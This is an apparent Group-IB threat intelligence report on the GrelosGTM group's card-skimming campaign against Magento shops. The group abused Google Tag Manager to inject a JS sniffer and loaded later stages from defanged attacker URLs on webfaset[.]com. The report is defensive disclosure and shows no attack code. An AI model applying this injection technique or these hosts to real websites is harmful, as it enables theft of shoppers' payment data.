GrelosGTM group abuses Google Tag Manager to attack e-commerce websites
Lead Threat Intelligence & Attribution analyst at Group-IB
Analysis of campaign
In their first attacks on e-commerce websites, this group used domains, which impersonated legitimate services like Google Analytics and Google Tag Manager. One year later, in April 2021, Group-IB specialists detected that apart from using domains mimicking the services, GrelosGTM group started to abuse Google Tag Manager legitimate functionality for their own purposes in infections of online shops.
Analysis of attacks
This specific campaign started in February 2021 and affected at least seven websites running CMS Magento in Belgium, Italy, the United Kingdom, and the United States. At the time of the publication, the JS sniffer has been active on at least four websites. Group-IB Computer Emergency Response Team (CERT-GIB) has informed all the websites infected of the incident.
For the initial stage of infection GrelosGTM group injected their own Google Tag Manager scripts to the source code of targeted websites. In most cases attackers used a direct link to the script located on legitimate googletagmanager.com domain, but in some infections they used an injector as shown on Figure 1.
Figure 1. Example of the injected code: Google Tag Manager script "GTM-5SF293J" was created by hackers
This Google Tag Manager script (Figure 2) contains malicious inject, which loads the next stage script from the attacker's website by URL hXXs://webfaset[.]com/str.css.
Figure 2: Google Tag Manager script with a malicious inject
Injected script is responsible for detecting the checkout page using regular expression and for downloading the main payload of JS sniffer using WebSocket from URL wss://webfaset[.]com:80/bootstrap.min.css (Figure 3).
Figure 3: Fragment of the source code of WebSocket-based injector
Below you can find both MITRE ATT&CK mapping and corresponding mitigations list.